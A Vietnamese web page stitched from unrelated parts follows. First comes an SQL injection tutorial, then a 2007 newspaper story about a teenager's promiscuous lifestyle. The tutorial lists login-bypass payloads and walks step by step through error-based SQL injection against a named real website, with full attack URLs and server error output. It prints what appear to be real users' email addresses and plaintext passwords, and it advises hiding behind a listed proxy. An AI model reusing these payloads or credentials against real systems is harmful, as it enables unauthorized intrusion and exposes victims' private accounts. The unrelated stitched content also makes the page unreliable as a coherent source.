Như vậy User và Pass của người thứ hai là agilent1agilent1

Đến đây tôi xin kết thúc bài viết của mình. Phần còn lại các bạn có thể tự làm nốt hoặc nghiên cứu gì đó cao siêu hơn.

Chúc các bạn Hack vui vẻ và đừng Drop DB của người ta nhé )

++ Sau một thời gian tìm hiểu về sql injection, cũng như muốn giúp cho một số bác newbie hiểu một cách gần như hòan chỉnh về Sql injeciton ?Vậy Sql injeciton là gì ? By pass login là gì ?

Có thể hiểu một cách cơ bản nhất về Sql injeciton là “lỗi xảy ra trong quá trình xử lý thông tin bên ngòai đưa vào” ….. còn by pass login có thể hiểu là ” với by pass thì ta có thể đăng nhập vào bất cứ nơi nào bị dính sql injection mà ta ko cần biết thông tin về user, pass, email …… ” …. cơ bản là như thế đấy, còn muốn hiểu rõ ràng hơn, cũng như khoa học hơn hãy tìm đọc trong các tài liệu của nước ngòai nhé (muốn tìm vào google.com search từ khóa là : sql injection exploit) … hoặc tham khảo các bài viết của các staff HVA (vicki, mrro, windak, $$$ ….)

++ Vậy by pass login như thế nào ? À, đôi khi bạn truy cập vào 1 số trang nào đó, bạn sẽ để ý có phần đăng nhập … và bạn muốn đăng nhập với quyền quản trị thì sao ? hì .. hì … chỉ cần biết user và pass là có thể đăng nhập thôi chứ gì ? Nhưng trong trường hợp ko biết thì pó tay .. hì hì … vậy by pass login sẽ giúp cho bạn đăng nhập vào nơi đó với quyền cao nhất .. cơ bản là vậy đó nha. Còn đây là một số data giúp bạn submit để xem coi nó bị by pass login ko :

Username
Password

Trích dẫn:

‘ or 1=1–
‘ or 1=1–” or 1=1–
” or 1=1–

or 1=1–
or 1=1–

‘ or ‘a’=’a
‘ or ‘a’=’a

” or “a”=”a
” or “a”=”a

‘) or (’a’=’a
‘) or (’a’=’a

( còn nhiều lắm đó, cơ bản là bao nhiêu đây, bạn có thể thay đổi như thế nào đó mà login được là thành công rồi ! )

++ Vậy sql injection như thế nào ?

Thực tập luôn nha (trước khi thực tập thì nên mask bằng proxy nhé, để cho an tòan mà : IP: 171.64.64.216, port: 3128 – proxy này level 5) hi vọng sau khi thực tập xong trang này bạn sẽ tích hợp được phần nào khái niệm hack bằng sql injection,

trang mình chọn là : http://www.gayseattle.com/ theo tìm hiểu sơ qua trang này ko có cc, cũng như ko có thông tin gì quan trọng cả, chủ yếu để các bạn tìm hiểu chứ ko hướng dẫn bạn hack cc …. nếu bạn nào thích thú thì xem như là thành công nho nhỏ rồi đó.

Sau khi vào http://www.gayseattle.com/ bạn nhìn bên phải có 1 form cho đăng nhập, thông tin cần là e-mail và password, để khai thác nhập vào chổ e-mail là những dấu sau (những dấu có màu đỏ nha) : ‘,”,),(, bạn sẽ nhận được một thông báo lỗi dạng như sau (sau khi bạn nhập vào dấu ‘):

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”’.
/login.asp, line 41

Wow .. wow .. vậy là trang này dính sql injection rồi, giờ là đến lúc chúng ta khai thác nó. Để lấy các table và column bạn có 2 cách ( dùng ‘ having 1=1–sp_password, kết hợp với ‘ group by tên cột đã biết having 1=1–sp_password ).

Dùng cách 1: Nhập vào ‘ having 1=1–sp_password vào chổ e-mail, bạn sẽ nhận được 1 thông báo như sau :

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Users.ID’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 41

Vậy là bạn biết tại form này nhận vào table Users và cột đầu tiên mang tên là : ID, giờ khai thác thêm các cột khác : Cũng tại chổ e-mail đó nhập vào : ‘ group by Users.ID having 1=1–sp_password nhận tiếp 1 thông báo như sau :

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Users.IRCID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/login.asp, line 41

Vậy là biết thêm có 1 cột nữa mang tên là IRCID dùng dấu , giữa 2 cột nhé, giờ lấy tên cột tiếp theo nữa : ‘ group by Users.ID,Users.IRCID having 1=1–sp_password

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Users.MatchMakerID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/login.asp, line 41

và nhận được thêm 1 cột nữa tên là : MatchMakerID, tiếp tục như thế bạn lấy tên các cột còn lại, đến khi nào hết thì thôi, khi nào lấy hết tên các cột thì nó sẽ trở lại trang login mà không có báo lỗi gì nữa cả. Đến lúc đó bạn đã biết rằng mình đã lấy hết tên các cột rồi đó.

Dùng cách 2: Hãy dạo một vòng trang web, click đại vào 1 link bất kỳ đi, miễn sao link đó có dạng xxx.asp?yyy=???, chẵng hạn như :

http://www.gayseattle.com/Community/…egory=Clothing, thử xem coi link này dính sql injection ko nhé, bằng cách xóa chử Clothing thay bằng dấu ‘ (dấu phẩy), (đôi khi một số trường hợp ta ko xóa chử đó mà chỉ cần thêm dấu ‘ thôi —> Clothing’ ) link sẽ như sau :

http://www.gayseattle.com/Community/YellowPages/directory.asp?Category=’

Nhận dc một thông báo .Vậy là xong, link này cũng dính sql injection ….. giờ ta lấy tên của các cột bằng ” magic convert ” do bên trên ta đã biết trang này có 1 table mang tên là : Users, để nhanh chóng ta đi vào lấy tên các cột của table này luôn mà không cần tìm tất cả các table hiện có.

Trích dẫn:

http://www.gayseattle.com/Community/YellowPages/directory.asp?Category=’ and 1=convert(int,(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ ))–sp_password’ and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’users’ ))–sp_password

Bạn sẽ nhận được 1 thông báo như sau :

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘id’ to a column of data type int.
/Community/YellowPages/directory.asp, line 19

cột đầu tiên cũng là id phải không ? quá đúng rồi còn gì nữa, giờ lấy tên các cột tiếp theo :

Trích dẫn:

http://www.gayseattle.com/Community/YellowPages/directory.asp?Category=’ and 1=convert(int,(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ and column_name not in(’id’)))–sp_password’ and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’users’ and column_name not in(’id’)))–sp_password

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘Firstname’ to a column of data type int.
/Community/YellowPages/directory.asp, line 19

Vậy là tên cột tiếp theo là FirstName, lấy tên cột kế tiếp :

Trích dẫn:

http://www.gayseattle.com/Community/YellowPages/directory.asp?Category=’ and 1=convert(int,(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ and column_name not in(’id’)))–sp_password’ and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’users’ and column_name not in(’id’,’firstname’)))–sp_password

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘LastName’ to a column of data type int.
/Community/YellowPages/directory.asp, line 19

các cột cách nhau bằng dấu , và tên cột nằm trong 2 dấu nháy ” như sau : ,’tên cột’, cứ như vậy ta lấy tên các cột tiếp theo nhé ! Mình cũng đã lấy hết các cột của bảng Users này rồi, bạn tham khảo xem coi có giống của bạn không nhé :

Trích dẫn:

‘ and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’users’ and column_name not in(’id’,’firstname’,’lastname’,’address’,’city’,’s tate’,’zip’,’email’,’password’,’emailok’,’postalma ilok’,’gayevents’,’singleevents’,’supportgroups’
,’irc’,’nightlife’,’businesses’,’otherinterests’,’ gender’,’ircnews’,’monitorresolution’,’monitorsize ‘,’hearaboutus’,’ircid’,’matchmakerid’,’age’
,’address2′,’dateregistered3′,’lastvisit’,’adverti serid’,’cookies’)))–sp_password

Bạn có để ý rằng với 2 cách trên thì thứ tự tên các cột bạn nhận được không giống nhau, nhưng dù cách nào đi nữa thì số cột cuối cùng bạn nhận được cũng như nhau mà thôi !

Lưu ý: Các cậu lệnh dùng để hack phải được viết trên 1 dòng nhé, không được xuống dòng nhé, do khuôn khổ trình bày đôi khi có sai lệch đôi chút, nhưng bạn phải nhớ kỹ nhé !

Vậy coi như là xong 50% rồi, giờ đến lúc bạn lấy info để login vào, trong form login đòi hỏi e-mail và password, giờ hãy nhìn lại số cột mà bạn nhận được từ bảng Users xem, khà khà .. thế nào, có tìm được cột có tên là email và password không, nếu ko có tức là bạn tìm chưa đủ, hãy tìm lại lần nữa nha ….

Khai thác thì có nhiều cách lắm, giờ mình hướng dẫn cách khai thác nhanh nhất, gọn nhất, còn các cách khác bạn chịu khó xem lại tài liệu của các Staff HVA nhé ! Dùng CONVERT để khai thác :

Trích dẫn:

http://www.gayseattle.com/Community/YellowPages/directory.asp?Category=’ and 1=convert(int,(select top 1 email+’/’+password from Users))–sp_password’ and 1=convert(int,(select top 1 email%2b’/’%2bpassword from Users))–sp_password

%2b == + (dấu %2b thay thế cho dấu +). Ta sẽ gộp 2 cột lại với nhau bằng dấu ‘/’ để kết quả sau khi nhận được dễ phân biệt hơn. Kết quả bạn sẽ nhận được là :

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘ygdrasil@mindspring.com/laeris’ to a column of data type int.
/Community/YellowPages/directory.asp, line 19

Wow … woow …. xong rùi đó, giờ Back lại trang chính và login vào xem thế nào nhé (http://www.gayseattle.com/login.asp) thành công rồi chứ ?? Giờ làm sao để lấy các thông tin khác nữa …. để lấy thông tin của thành viên khác thì ta sẽ lọai trừ cái email của người mà vừa lấy xong ……….

Trích dẫn:

http://www.gayseattle.com/Community/YellowPages/directory.asp?Category=’ and 1=convert(int,(select top 1 email+’/’+password from Users where email not in(’ygdrasil@mindspring.com’)))–sp_password’ and 1=convert(int,(select top 1 email%2b’/’%2bpassword from Users where email not mailto:in(’ygdrasil@mindspring.com’)))–sp_password))–sp_password

Kết quả nhận được là :

Trích dẫn:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘louisk@guiware.com/lmk1234′ to a column of data type int.
/Community/YellowPages/directory.asp, line 19

Tình thoáng

giaitrisms — Tue, 20 Nov 2007 07:38:05 +0000

Lối sống buông thả, trụy lạc thường chỉ tìm đến những người thiếu bản lĩnh.

“Tớ yêu thoáng, sống thoáng và quan hệ cũng thoáng. Khi thì làm chuyện đó ở nhà, khi thì ở nhà nghỉ và cũng chẳng việc gì phải ngại ngùng, e sợ. Đó là chuyện bình thường trong khi yêu. Mọi người lo tớ có bầu à? Đúng là âm lịch…”.

Ly trượt tốt nghiệp THPT. Bố Ly bị sốc nặng! Ông không thể ngờ cô con gái được chăm lo đầy đủ điều kiện học tập lại “tặng” ông kết quả thi tốt nghiệp thấp thảm hại.

Thất vọng đến bất ngờ, ông đã bỏ làm mấy ngày để tìm hiểu nguyên nhân tại sao con gái trượt tốt nghiệp. Thế nhưng, bạn bè cùng lớp lại không bất ngờ về chuyện Ly không đỗ tốt nghiệp. Bởi nó quá say sưa chinh chiến với những cuộc tình.

Từ năm học lớp 10, nó đã khiến cả lớp “choáng”, đúng hơn là kinh ngạc bởi tuyên bố: “Với tớ thì… tình cho không, biếu không”. Một diễn đàn về quan điểm tình yêu tuổi teen đã được nó mở ra trong lớp:

Quan điểm của nó là Yêu là cho và cho là không mất gì…!

Giang – Đại diện phái nam của lớp vặn lại: Không mất gì! Chỉ mất 9 tháng 10 ngày bụng to.

Mi – Lớp trưởng bật: Hay mất công leo lên “giường trắng” phá thai. Sao lại không mất gì?

Nó ngúng nguẩy quay đi, không nói thêm lời nào. Với nó, chuyện tình yêu cực kỳ đơn giản. Quen nhau qua mạng, nói chuyện hợp gu thì hẹn hò cà phê. Có cảm tình ngay từ lần đầu gặp thì yêu, thì đi chơi… Thậm chí nó sẽ chủ động đặt vấn đề yêu nếu nó thấy kết ai đó.

Bạn bè trong lớp thấy tiếc cho nó vì quan điểm ấy mà không ai theo kịp, nên bị gắn biệt danh: Ly – tình cho không, biếu không. Cũng vì quan điểm ấy nên nó có nhiều người yêu và yêu cũng nhiều người. Nó thay người yêu như thay áo.

Tháng trước nó đưa một chàng đến dự sinh nhật Liên. Nhưng tháng này đã thấy một chàng khác chờ nó ngoài cổng trường. Tất cả những anh chàng đó (mà nó quen gọi là chồng) đều được nó quen và hẹn hò qua chat.

Với chàng nào nó cũng nhiệt tình, cũng yêu thương hết mực, cũng hết mình và cũng là mối tình thứ nhất. Nó chiều người yêu chuyện ấy mà không mảy may suy nghĩ (nó nói thẳng với bạn bè như thế). Đơn giản, bởi nó coi đó là chuyện bình thường: Chẳng mất, chẳng được gì.

Nó hồn nhiên tâm sự với tôi: “Tớ yêu thoáng, sống thoáng và quan hệ cũng thoáng. Khi thì làm chuyện đó ở nhà, khi thì ở nhà nghỉ và cũng chẳng việc gì phải ngại ngùng, e sợ. Đó là chuyện bình thường trong khi yêu. Mọi người lo tớ có bầu à? Đúng là âm lịch.

Trong túi tớ lúc nào mà chẳng có bao cao su hoặc thuốc tránh thai. Thanh niên @ mà thiếu hiểu biết thế thì coi sao được. Tớ chỉ sợ những người cổ lỗ sĩ như Mi lớp trưởng mới có bầu thôi…” – Nó nói lạnh tanh cứ như một chuyên gia sức khoẻ sinh sản vậy.

Đúng là đại thoáng chứ không phải là thoáng.

Thay vì đến lớp học, hay học bài ở nhà, nó thường đến nhà người yêu. “Đến nhà bạn học nhóm hay đi học thêm” là những chiêu nó thường sử dụng để đối phó phụ huynh.

Có tuần bị nhắc nhở vì vắng học nhiều quá, nó đành ngậm ngùi chăm chỉ đến lớp hơn. Ngồi trong lớp nhưng tâm hồn nó thả theo gió và nghĩ đến những cuộc vui tiếp theo cùng chàng.

Khi bạn bè trong lớp đang gấp rút học ôn để chuẩn bị bước vào kỳ thi đại học thì nó nằm ở nhà ôm tiếc nuối. Nó vừa chia tay một chàng xong. Cũng chẳng ai biết đó là “chồng” thứ bao nhiêu. Hiện, nó không được khỏe. Ngẫm nghĩ lại nó mới thấy bạn bè nói đúng. Nó mạnh mồm thế nhưng cũng đã phải nhiều lần leo lên chiếc “giường trắng” để giải quyết hậu quả.

Nó bị ám ảnh và sợ hãi khi nghĩ đến bệnh viện. Vì nó thoáng nên rơi vào tay các anh chàng họ Sở. Họ thay nhau hưởng hương hoa của nó, còn hậu quả thì chỉ mình nó gánh chịu. Nó đã từng tâm sự với tôi: Sống thế này trống rỗng lắm, chẳng ai muốn cả nhưng mình đã quá đà rồi…

Bố nó cuối cùng cũng đã hiểu vì sao con gái trượt tốt nghiệp. Ông thêm một lần bị sốc vì cứ nghĩ con gái sống trong nhung lụa, học hành tử tế nghe lời bố mẹ, ai dè nó lại sống buông thả đến thế. Ông buồn lắm nhưng có lẽ, ông nên một lần đi tìm hiểu nguyên nhân vì sao con gái mình lại có quan điểm sống thoáng như thế.

Theo Lê Thu Huyền

Tiền Phong